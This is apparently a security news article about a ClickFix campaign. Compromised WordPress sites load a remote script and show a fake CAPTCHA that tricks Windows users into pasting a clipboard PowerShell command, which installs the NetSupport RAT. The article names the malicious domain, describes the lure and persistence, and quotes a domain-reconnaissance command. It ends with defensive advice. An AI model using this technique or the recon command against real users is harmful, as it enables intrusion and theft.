Hackers Use ClickFix Technique to Deploy NetSupport RAT via Compromised WordPress Sites

Security researchers have uncovered a sophisticated cyberattack campaign leveraging compromised WordPress websites to distribute the NetSupport Remote Access Trojan through an innovative social engineering method dubbed “ClickFix.”

The Cybereason Global Security Operations Center (GSOC) discovered the campaign in May 2025, revealing how threat actors are weaponizing legitimate remote access tools to gain unauthorized control over victim computers.

The attack represents a significant evolution in cybercriminal tactics, combining website compromise with psychological manipulation to bypass modern security defenses.

Multi-Stage Attack Chain

The campaign begins with phishing emails, PDF attachments, or malicious links posted on gaming websites that redirect users to compromised WordPress sites.

Once visitors land on these infected pages, malicious JavaScript code hidden in the website’s meta description automatically loads and executes a remote script called “j.js” from the domain islonline.org.

“The attackers are specifically targeting Windows users and have built in mechanisms to avoid detection,” said cybersecurity analysts familiar with the investigation.

The malicious script first identifies the user’s operating system and browser details, then checks if they’ve visited the site before using local storage tracking to minimize exposure.

The most innovative aspect of the attack involves what researchers call the “ClickFix” technique.

After the initial infection, victims are presented with a fake CAPTCHA verification page that appears legitimate, complete with modern styling using React frameworks and TailwindCSS.

However, instead of verifying human interaction, the page secretly copies a malicious PowerShell command to the user’s clipboard.

Clipboard Hijacking Deception

The fake CAPTCHA then instructs users to press Windows + R and paste the “verification code” into the Run dialog box.

Believing they’re completing a standard security check, victims unknowingly execute a command that downloads and installs the NetSupport Client software.

“This technique is particularly insidious because it exploits user familiarity with CAPTCHA challenges while bypassing browser security controls,” explained security researchers.

“The user themselves perform the final execution step, evading automated detection systems.” Once installed, the NetSupport Client establishes a persistent connection to command-and-control servers located in Moldova.

The malware creates registry entries for persistence and can survive system reboots, allowing attackers to maintain long-term access to compromised systems.

Post-Infection Activities

Within hours of a successful compromise, threat actors have been observed conducting reconnaissance activities, including querying Active Directory for domain computers and transferring files to public directories.

The attackers use NetSupport’s legitimate remote command prompt feature to execute commands such as “net group /domain ‘Domain Computers’” to map the network infrastructure.

According to threat intelligence data, NetSupport Manager ranked as the seventh most prevalent threat in 2024, with cybercriminals increasingly favoring legitimate tools to blend malicious activities with normal IT operations.

Security experts recommend immediate isolation of affected systems, password resets for compromised accounts, and blocking of identified malicious domains and IP addresses.

Organizations should also implement monitoring for unusual PowerShell activity and clipboard manipulation in browser contexts.

“The key is recognizing that any instruction requiring users to paste commands into Windows Run dialogs should be treated as highly suspicious,” security researchers emphasized.

Website administrators are advised to regularly audit WordPress themes and plugins for unauthorized script injections.

The campaign highlights the evolving threat landscape where attackers increasingly rely on social engineering rather than technical exploits to achieve their objectives.

Exclusive Webinar Alert: Harnessing Intel® Processor Innovations for Advanced API Security – Register for Free